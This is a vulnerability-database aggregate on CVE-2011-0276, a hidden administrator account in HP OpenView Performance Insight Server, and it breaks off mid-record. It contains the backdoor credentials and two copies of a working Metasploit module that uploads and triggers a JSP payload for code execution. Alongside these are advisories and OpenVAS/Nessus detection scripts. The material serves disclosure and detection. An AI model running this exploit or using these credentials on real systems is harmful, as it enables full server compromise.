{"cve": [{"lastseen": "2018-10-11T11:34:41", "bulletinFamily": "NVD", "description": "HP OpenView Performance Insight Server 5.2, 5.3, 5.31, 5.4, and 5.41 contains a \"hidden account\" in the com.trinagy.security.XMLUserManager Java class, which allows remote attackers to execute arbitrary code via the doPost method in the com.trinagy.servlet.HelpManagerServlet class.", "modified": "2018-10-10T16:09:29", "published": "2011-02-01T20:00:06", "id": "CVE-2011-0276", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0276", "title": "CVE-2011-0276", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2018-11-01T13:51:25", "bulletinFamily": "exploit", "description": "This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java class. When using this account, an attacker can abuse the com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system allowing the execution of arbitrary code. NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0", "modified": "2018-08-20T21:05:58", "published": "2011-03-15T21:22:07", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_OPENVIEW_INSIGHT_BACKDOOR", "href": "", "type": "metasploit", "title": "HP OpenView Performance Insight Server Backdoor Account Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Performance Insight Server Backdoor Account Code Execution',\n 'Description' => %q{\n This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\n class. When using this account, an attacker can abuse the\n com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system\n allowing the execution of arbitrary code.\n\n NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Privileged' => true,\n 'References' =>\n [\n [ 'CVE', '2011-0276' ],\n [ 'OSVDB', '70754' ],\n ],\n 'Targets' =>\n [\n [ 'Universal Windows Target',\n {\n 'Arch' => ARCH_JAVA,\n 'Payload' =>\n {\n 'DisableNops' => true,\n },\n }\n ],\n ],\n 'DefaultOptions' =>\n {\n 'SHELL' => 'cmd.exe'\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jan 31 2011'))\n\n register_options(\n [\n OptString.new('USERNAME', [ true, 'The username to authenticate as', 'hch908v' ]),\n OptString.new('PASSWORD', [ true, 'The password for the specified username', 'z6t0j$+i' ])\n ])\n\n end\n\n def exploit\n\n creds = \"#{datastore['USERNAME']}\" + \":\" + \"#{datastore['PASSWORD']}\"\n\n dir = rand_text_alpha_upper(rand(8) + 1)\n page = rand_text_alpha_upper(8) + \".jsp\"\n uid = rand(20).to_s\n\n file = \"-----------------------------#{uid}\\r\\n\"\n file << \"Content-Disposition: form-data; name=\\\"filename\\\"; filename=\\\"#{page}\\\"\\r\\n\"\n file << \"Content-Type: application/x-java-archive\\r\\n\\r\\n\"\n file << payload.encoded + \"\\r\\n\"\n file << \"-----------------------------#{uid}\\r\\n\"\n # if (p.getName().equals(\"location\")); ...\n file << \"Content-Disposition: form-data; name=\\\"location\\\"\\r\\n\"\n file << \"Content-Type: text/plain\\r\\n\\r\\n\"\n file << dir + \"\\r\\n\"\n file << \"-----------------------------#{uid}\\r\\n\\r\\n\"\n\n print_status(\"Sending our POST request...\")\n\n res = send_request_cgi(\n {\n 'uri'\t\t=> \"/reports/helpmanager\",\n 'version'\t=> '1.1',\n 'method'\t=> 'POST',\n 'ctype' => 'multipart/form-data; boundary=---------------------------' + uid,\n 'data'\t\t=> file,\n 'headers'\t=>\n {\n=begin\nthis.internal = new User(\"hch908v\");\nthis.internal.setName(\"hidden user\");\nthis.internal.setEncryptedPassword(TrendCrypt.crypt(\"hch908v\", \"z6t0j$+i\"));\nthis.internal.addRole(\"user\");\nthis.internal.addRole(\"admin\");\n=end\n 'Authorization' => \"Basic #{Rex::Text.encode_base64(creds)}\",\n\n }\n }, 5)\n\n if ( res and res.code == 200 )\n print_good(\"Login/Upload successful. Triggering payload at '/help/#{dir}/#{page}'...\")\n send_request_raw({\n 'uri'\t\t=> \"/help/#{dir}/#{page}\",\n 'method'\t=> 'GET',\n 'version'\t=> '1.0',\n }, 5)\n\n handler\n else\n print_error(\"Login/Upload refused!\")\n return\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/hp_openview_insight_backdoor.rb"}], "exploitdb": [{"lastseen": "2016-02-02T06:57:29", "bulletinFamily": "exploit", "description": "HP OpenView Performance Insight Server Backdoor Account Code Execution. CVE-2011-0276. Remote exploit for windows platform", "modified": "2011-03-15T00:00:00", "published": "2011-03-15T00:00:00", "id": "EDB-ID:16984", "href": "https://www.exploit-db.com/exploits/16984/", "type": "exploitdb", "title": "HP OpenView Performance Insight Server Backdoor Account Code Execution", "sourceData": "##\r\n# $Id: hp_openview_insight_backdoor.rb 11969 2011-03-15 21:56:11Z swtornio $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Performance Insight Server Backdoor Account Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\r\n\t\t\t\tclass. When using this account, an attacker can abuse the \r\n\t\t\t\tcom.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system \r\n\t\t\t\tallowing the execution of arbitary code.\r\n\r\n\t\t\t\tNOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 11969 $',\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-0276' ],\r\n\t\t\t\t\t[ 'OSVDB', '70754' ],\r\n\t\t\t\t],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Universal Windows Target',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t\t'Payload' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t\t\t\t},\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 31 2011'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(80),\r\n\t\t\t\tOptString.new('USERNAME', [ false, 'The username to authenticate as', 'hch908v' ]),\r\n\t\t\t\tOptString.new('PASSWORD', [ false, 'The password for the specified username', 'z6t0j$+i' ])\r\n\t\t\t], self.class )\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tcreds = \"#{datastore['USERNAME']}\" + \":\" + \"#{datastore['PASSWORD']}\"\r\n\r\n\t\tdir = rand_text_alpha_upper(rand(8) + 1)\r\n\t\tpage = rand_text_alpha_upper(8) + \".jsp\"\r\n\t\tuid = rand(20).to_s\r\n\r\n\t\tfile = \"-----------------------------#{uid}\\r\\n\"\r\n\t\tfile << \"Content-Disposition: form-data; name=\\\"filename\\\"; filename=\\\"#{page}\\\"\\r\\n\"\r\n\t\tfile << \"Content-Type: application/x-java-archive\\r\\n\\r\\n\"\r\n\t\tfile << payload.encoded + \"\\r\\n\"\r\n\t\tfile << \"-----------------------------#{uid}\\r\\n\"\r\n\t\t# if (p.getName().equals(\"location\")); ...\r\n\t\tfile << \"Content-Disposition: form-data; name=\\\"location\\\"\\r\\n\"\r\n\t\tfile << \"Content-Type: text/plain\\r\\n\\r\\n\"\r\n\t\tfile << dir + \"\\r\\n\"\r\n\t\tfile << \"-----------------------------#{uid}\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Sending our POST request...\")\r\n\r\n\t\tres = send_request_cgi(\r\n\t\t\t{\r\n\t\t\t\t'uri'\t\t=> \"/reports/helpmanager\",\r\n\t\t\t\t'version'\t=> '1.1',\r\n\t\t\t\t'method'\t=> 'POST',\r\n\t\t\t\t'ctype' => 'multipart/form-data; boundary=---------------------------' + uid,\r\n\t\t\t\t'data'\t\t=> file,\r\n\t\t\t\t'headers'\t=>\r\n\t\t\t\t\t{\r\n=begin\r\nthis.internal = new User(\"hch908v\");\r\nthis.internal.setName(\"hidden user\");\r\nthis.internal.setEncryptedPassword(TrendCrypt.crypt(\"hch908v\", \"z6t0j$+i\"));\r\nthis.internal.addRole(\"user\");\r\nthis.internal.addRole(\"admin\");\r\n=end\r\n\t\t\t\t\t\t'Authorization' => \"Basic #{Rex::Text.encode_base64(creds)}\",\r\n\r\n\t\t\t\t\t}\r\n\t\t\t}, 5)\r\n\t\t\r\n\t\tif ( res and res.code == 200 )\r\n\t\t\tprint_status(\"Login/Upload successful. Triggering payload at '/help/#{dir}/#{page}'...\")\r\n\t\t\tsend_request_raw({\r\n\t\t\t\t\t'uri'\t\t=> \"/help/#{dir}/#{page}\",\r\n\t\t\t\t\t'method'\t=> 'GET',\r\n\t\t\t\t\t'version'\t=> '1.0',\r\n\t\t\t}, 5)\r\n\r\n\t\t\thandler\r\n\t\telse\r\n\t\t\tprint_error(\"Login/Upload refused!\")\r\n\t\t\treturn\r\n\t\tend\r\n\tend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16984/"}], "saint": [{"lastseen": "2018-08-31T00:08:18", "bulletinFamily": "exploit", "description": "Added: 03/03/2011 \nCVE: [CVE-2011-0276](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0276>) \nBID: [46079](<http://www.securityfocus.com/bid/46079>) \nOSVDB: [70754](<http://www.osvdb.org/70754>) \n\n\n### Background\n\nHP OpenView Performance Insight (OVPI) Server is a management utility that monitors and reports on the performance of services. \n\n### Problem\n\nA backdoor account may allow an attacker to execute arbitrary code on the system. \n\n### Resolution\n\nApply patch [5.41.002 piweb HF02](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453>). \n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453> \n<http://secunia.com/advisories/43145> \n<http://osvdb.org/70754> \n<http://www.securityfocus.com/bid/46079> \n\n\n### Limitations\n\nThis exploit works against HP OpenView Performance Insight (OVPI) 5.41.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP1 English (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-03-03T00:00:00", "published": "2011-03-03T00:00:00", "id": "SAINT:3582F99C02FED42EFF486320A1B28D87", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_ovpi_server_backdoor", "title": "HP OpenView Performance Insight Server Backdoor Account", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:03", "bulletinFamily": "exploit", "description": "Added: 03/03/2011 \nCVE: [CVE-2011-0276](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0276>) \nBID: [46079](<http://www.securityfocus.com/bid/46079>) \nOSVDB: [70754](<http://www.osvdb.org/70754>) \n\n\n### Background\n\nHP OpenView Performance Insight (OVPI) Server is a management utility that monitors and reports on the performance of services. \n\n### Problem\n\nA backdoor account may allow an attacker to execute arbitrary code on the system. \n\n### Resolution\n\nApply patch [5.41.002 piweb HF02](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453>). \n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453> \n<http://secunia.com/advisories/43145> \n<http://osvdb.org/70754> \n<http://www.securityfocus.com/bid/46079> \n\n\n### Limitations\n\nThis exploit works against HP OpenView Performance Insight (OVPI) 5.41.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP1 English (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-03-03T00:00:00", "published": "2011-03-03T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_ovpi_server_backdoor", "id": "SAINT:EDEA47E1E827D075C2146A728AAD9C48", "title": "HP OpenView Performance Insight Server Backdoor Account", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "description": "Added: 03/03/2011 \nCVE: [CVE-2011-0276](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0276>) \nBID: [46079](<http://www.securityfocus.com/bid/46079>) \nOSVDB: [70754](<http://www.osvdb.org/70754>) \n\n\n### Background\n\nHP OpenView Performance Insight (OVPI) Server is a management utility that monitors and reports on the performance of services. \n\n### Problem\n\nA backdoor account may allow an attacker to execute arbitrary code on the system. \n\n### Resolution\n\nApply patch [5.41.002 piweb HF02](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453>). \n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453> \n<http://secunia.com/advisories/43145> \n<http://osvdb.org/70754> \n<http://www.securityfocus.com/bid/46079> \n\n\n### Limitations\n\nThis exploit works against HP OpenView Performance Insight (OVPI) 5.41.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP1 English (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-03-03T00:00:00", "published": "2011-03-03T00:00:00", "id": "SAINT:5EC75B2A869099E2347B980D90EADB02", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_ovpi_server_backdoor", "type": "saint", "title": "HP OpenView Performance Insight Server Backdoor Account", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-09-04T14:19:33", "bulletinFamily": "scanner", "description": "HP OpenView Performance Insight Server is prone to a remote\ncode-execution vulnerability.\n\nAn attacker can exploit this issue to execute arbitrary code with\nSYSTEM-level privileges. Successful exploits will completely compromise\naffected computers.", "modified": "2017-09-01T00:00:00", "published": "2011-02-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=103060", "id": "OPENVAS:103060", "title": "HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hp_performance_insight_46079.nasl 7044 2017-09-01 11:50:59Z teissa $\n#\n# HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"HP OpenView Performance Insight Server is prone to a remote\ncode-execution vulnerability.\n\nAn attacker can exploit this issue to execute arbitrary code with\nSYSTEM-level privileges. Successful exploits will completely compromise\naffected computers.\";\n\ntag_solution = \"Updates are available. Please see the references for details.\";\n\nif (description)\n{\n script_xref(name : \"URL\" , value : \"https://www.securityfocus.com/bid/46079\");\n script_xref(name : \"URL\" , value : \"http://www.hp.com/\");\n script_xref(name : \"URL\" , value : \"http://www.zerodayinitiative.com/advisories/ZDI-11-034/\");\n script_xref(name : \"URL\" , value : \"http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453\");\n script_id(103060);\n script_version(\"$Revision: 7044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-01 13:50:59 +0200 (Fri, 01 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-03 16:40:04 +0100 (Thu, 03 Feb 2011)\");\n script_bugtraq_id(46079);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0276\");\n\n script_name(\"HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_hp_performance_insight_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_http_port(default:8080);\nif(!get_port_state(port))exit(0);\n\nif(!get_dir_from_kb(port:port,app:\"hp_openview_insight\"))exit(0);\n\nuserpass = \"hch908v:z6t0j$+i\";\n\nurl = \"/reports/home?context=home&type=header&ov_user=hch908v\";\n\nreq = string(\"GET \", url,\" HTTP/1.1\\r\\n\", \"Host: \", get_host_name(),\"\\r\\n\\r\\n\");\nresp = http_keepalive_send_recv(port:port, data:req);\nif(\"401 Unauthorized\" >!< resp)exit(0); # just to be sure\n\nuserpass64 = base64(str:userpass);\n\nreq = string(\"GET \", url,\" HTTP/1.1\\r\\n\",\n\t \"Host: \", get_host_name(),\"\\r\\n\",\n\t \"Authorization: Basic \",userpass64,\"\\r\\n\",\n\t \"\\r\\n\");\nresp = http_keepalive_send_recv(port:port, data:req);\n\nif(\"Log off hch908v\" >< resp && \"Administration</a>\" >< resp) {\n msg = string(\"The Scanner was able to access the URL '\",url, \"'\\nusing username 'hch908v' and password 'z6t0j$+i'.\\n\");\n security_message(port:port,data:msg);\n exit(0);\n} \n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:44:22", "bulletinFamily": "scanner", "description": "HP OpenView Performance Insight Server is prone to a remote\ncode-execution vulnerability.\n\nAn attacker can exploit this issue to execute arbitrary code with\nSYSTEM-level privileges. Successful exploits will completely compromise\naffected computers.", "modified": "2018-10-22T00:00:00", "published": "2011-02-03T00:00:00", "id": "OPENVAS:1361412562310103060", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103060", "title": "HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hp_performance_insight_46079.nasl 12006 2018-10-22 07:42:16Z mmartin $\n#\n# HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/46079\");\n script_xref(name:\"URL\", value:\"http://www.hp.com/\");\n script_xref(name:\"URL\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-11-034/\");\n script_xref(name:\"URL\", value:\"http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.103060\");\n script_version(\"$Revision: 12006 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 09:42:16 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-03 16:40:04 +0100 (Thu, 03 Feb 2011)\");\n script_bugtraq_id(46079);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0276\");\n\n script_name(\"HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_hp_performance_insight_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for details.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"HP OpenView Performance Insight Server is prone to a remote\ncode-execution vulnerability.\n\nAn attacker can exploit this issue to execute arbitrary code with\nSYSTEM-level privileges. Successful exploits will completely compromise\naffected computers.\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_http_port(default:8080);\nif(!get_port_state(port))exit(0);\n\nif(!get_dir_from_kb(port:port,app:\"hp_openview_insight\"))exit(0);\n\nuserpass = \"hch908v:z6t0j$+i\";\n\nurl = \"/reports/home?context=home&type=header&ov_user=hch908v\";\n\nreq = string(\"GET \", url,\" HTTP/1.1\\r\\n\", \"Host: \", get_host_name(),\"\\r\\n\\r\\n\");\nresp = http_keepalive_send_recv(port:port, data:req);\nif(\"401 Unauthorized\" >!< resp)exit(0); # just to be sure\n\nuserpass64 = base64(str:userpass);\n\nreq = string(\"GET \", url,\" HTTP/1.1\\r\\n\",\n\t \"Host: \", get_host_name(),\"\\r\\n\",\n\t \"Authorization: Basic \",userpass64,\"\\r\\n\",\n\t \"\\r\\n\");\nresp = http_keepalive_send_recv(port:port, data:req);\n\nif(\"Log off hch908v\" >< resp && \"Administration</a>\" >< resp) {\n msg = string(\"The Scanner was able to access the URL '\",url, \"'\\nusing username 'hch908v' and password 'z6t0j$+i'.\\n\");\n security_message(port:port,data:msg);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:11:42", "bulletinFamily": "scanner", "description": "Nessus was able to log into the remote HP OpenView Performance Insight\nsystem using a hidden account. The 'hch908v' user, hard-coded in the\n'com.trinagy.security.XMLUserManager' class, is hidden and has\nadministrative privileges.\n\nA remote attacker could exploit this by logging in as the hidden user\nand gain administrative access to the Performance Insight\ninstallation.\n\nAfter gaining administrative access to the web application, escalation\nof privileges may be possible. Nessus has not checked for that issue.", "modified": "2018-11-15T00:00:00", "published": "2011-02-02T00:00:00", "id": "HP_OPENVIEW_PERF_INSIGHT_BACKDOOR.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51850", "title": "HP OpenView Performance Insight Server Backdoor Account", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(51850);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:17\");\n\n script_cve_id(\"CVE-2011-0276\");\n script_bugtraq_id(46079);\n script_xref(name:\"EDB-ID\", value:\"16984\");\n script_xref(name:\"Secunia\", value:\"43145\");\n\n script_name(english:\"HP OpenView Performance Insight Server Backdoor Account\");\n script_summary(english:\"Tries to login to the hidden hch908v account\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"It is possible to log on the remote web application by using a hidden\naccount.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Nessus was able to log into the remote HP OpenView Performance Insight\nsystem using a hidden account. The 'hch908v' user, hard-coded in the\n'com.trinagy.security.XMLUserManager' class, is hidden and has\nadministrative privileges.\n\nA remote attacker could exploit this by logging in as the hidden user\nand gain administrative access to the Performance Insight\ninstallation.\n\nAfter gaining administrative access to the web application, escalation\nof privileges may be possible. Nessus has not checked for that issue.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-034/\");\n # http://web.archive.org/web/20130318065946/http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?84978b0a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the hotfix referenced in the HP advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Performance Insight Server Backdoor Account Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:openview_performance_insight\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_openview_perf_insight_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/hp_ovpi\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'hp_ovpi', port:port, exit_on_fail:TRUE);\n\nuser = 'hch908v';\npass = 'z6t0j$+i';\nurl = install['dir'] + '/reports/home?context=home&type=header';\nres = http_send_recv3(\n method:'GET',\n item:url,\n port:port,\n username:user,\n password:pass,\n exit_on_fail:TRUE\n);\n\nif ('Log off ' + user + '</a>' >< res[2])\n{\n if (report_verbosity > 0)\n {\n header = 'Nessus accessed the following URL as the hidden user';\n trailer =\n ' Username : ' + user + '\\n' +\n ' Password : ' + pass;\n report = get_vuln_report(items:url, port:port, header:header, trailer:trailer);\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n{\n base_url = build_url(qs:install['dir'], port:port);\n exit(0, 'The HP OVPI install at ' + base_url + ' is not affected.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:01", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Performance Insight Server. Authentication is not required to exploit this vulnerability.\n\nThe specific vulnerability is due to a hidden account present within the com.trinagy.security.XMLUserManager Java class. Using this account a malicious user can access the com.trinagy.servlet.HelpManagerServlet class. This is defined within the piweb.jar file installed with Performance Insight. This class exposes a doPost() method which an attacker can use to upload malicious files to the server. Accessing these files can then lead to arbitrary code execution under the context of the SYSTEM user.", "modified": 